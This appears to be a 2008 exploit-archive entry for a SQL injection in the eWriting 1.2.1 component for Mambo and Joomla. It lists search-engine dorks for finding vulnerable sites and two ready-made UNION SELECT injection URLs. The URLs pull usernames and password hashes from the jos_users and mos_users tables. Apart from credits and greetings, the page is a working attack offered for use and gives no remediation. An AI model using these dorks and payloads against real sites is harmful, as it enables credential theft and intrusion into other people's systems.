[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mambo Component eWriting 1.2.1 (cat) SQL Injection Vulnerability
# Published : 2008-03-10
# Author : Don
# Previous Title : Danneo CMS <= 0.5.1 Remote Blind SQL Injection Exploit
# Next Title : phpMyNewsletter <= 0.8b5 (archives.php msg_id) SQL Injection Exploit
eWriting 1.2.1 - SQL injection
# Discovered by breaker_unit & Don
# BHack
# b4lc4n.org
# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l
Dorks:
"Powered by eWriting 1.2.1
allinurl:"com_ewriting"
Joomla!
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--
Mambo
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--
++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# www.Syue.com [2008-03-10]